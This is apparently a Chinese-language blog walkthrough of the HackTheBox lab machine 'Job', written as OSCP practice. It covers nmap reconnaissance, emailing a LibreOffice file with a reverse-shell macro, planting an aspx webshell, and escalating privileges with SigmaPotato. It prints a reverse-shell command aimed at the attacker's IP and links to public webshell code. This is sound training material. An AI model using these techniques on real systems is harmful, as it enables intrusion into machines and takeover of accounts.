OSCP Job Write-up

本文最后更新于 2026年3月12日 下午

一、靶场详情

靶场名称:

Job

靶场地址:

https://app.hackthebox.com/machines/757

靶场环境连接说明:

演示为 HackTheBox 平台在线靶机,需通过 OpenVPN 客户端连接平台提供的 VPN 环境才能访问靶机。注意:平台新发布的靶机可以免费练习,而历史靶机则需要开通会员才能使用。还需要注意连接 HackTheBox 平台 VPN 需要挂载代理,具体方式可参考之前的历史文章或留言。

二、思路总结

突破边界(获取用户旗帜):

发送包含反弹 shell 的 LibreOffice 文件 –> 系统 jack.black 用户权限 –> 用户旗帜

权限提升(获取管理员旗帜):

网站根目录写入 web shell –> 系统服务账号权限 –> 土豆提权工具 –> 系统 system 权限 –> 管理员旗帜

三、靶场攻击演示

3.1 靶场信息收集

使用 nmap 对靶机进行端口扫描。

TCP 端口扫描:

1
2
3
4
5
6
7
8
sudo nmap -p- 10.129.234.73 --min-rate=2000

PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5985/tcp open wsman

UDP 端口扫描:未发现可利用的端口。

继续使用 nmap 对已开放端口的服务进行信息收集。

TCP 服务信息搜集:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
sudo nmap -p25,80,445,3389,5985 -sCV 10.129.234.73

PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
| smtp-commands: JOB, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Job.local
|_http-server-header: Microsoft-IIS/10.0
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-10-24T01:56:40+00:00; -8s from scanner time.
| ssl-cert: Subject: commonName=job
| Not valid before: 2025-09-04T13:43:05
|_Not valid after: 2026-03-06T13:43:05
| rdp-ntlm-info:
| Target_Name: JOB
| NetBIOS_Domain_Name: JOB
| NetBIOS_Computer_Name: JOB
| DNS_Domain_Name: job
| DNS_Computer_Name: job
| Product_Version: 10.0.20348
|_ System_Time: 2025-10-24T01:55:59+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: JOB; OS: Windows; CPE: cpe:/o:microsoft:windows

由此得出结论:

系统为 Windows 环境,开放有 SMB、SMTP、HTTP 和 WINRM 以及 RDP 服务。

3.2 渗透测试突破边界

3.2.1 LibreOffice 宏反弹 shell

访问靶机 HTTP 80 服务,根据页面提示以及开放的 SMTP 端口判断,大概率需要进行客户端攻击,发送包含反弹 shell 宏的 LibreOffice 文档。

打开 LibreOffice 创建包含宏反弹 shell 文件,然后通过 sendmail 工具将文件发送至 career@job.local 邮箱,最终可得到系统 jack.black 用户权限。

LibreOffice 宏反弹 shell 详细利用场景参考历史文章(点击跳转)。

宏内容

reverse shell

3.2.2 用户旗帜获取

3.3 提权获取系统最高权限

3.3.1 网站根目录写入 webshell 得到系统 IIS 服务账号权限

Windows 服务账号一般都具有特殊权限,由于靶机开放有 HTTP 服务,如果对网站根目录具有写入权限,就可以通过写入 webshell 获取服务账号权限。

测试可成功写入文件。

上传 aspx webshell。

1
https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx

得到系统 IIS 服务账号权限。

3.3.2 土豆工具提权至系统 system

IIS 服务账号具有 SeImpersonatePrivilege 特权,可通过土豆工具提升至系统 system 权限。

1
https://github.com/tylerdotrar/SigmaPotato

1
/c C:\inetpub\wwwroot\SigmaPotato.exe --revshell 10.10.16.9 445

3.3.3 管理员旗帜获取

Thanks

如果我的文章对您有帮助或您希望与我更多交流,欢迎点击「关于我」,通过页面中的微信公众号、邮箱或 Discord 与我联系;若您发现文章中存在任何错误或不足之处,也非常欢迎通过以上方式指出,在此一并致以衷心的感谢。 😊🫡

最后,祝您生活愉快!🌞✨


OSCP Job Write-up
https://www.f0nesec.top/2025/10/31/oscp-job/
作者
F0ne
发布于
2025年10月31日
许可协议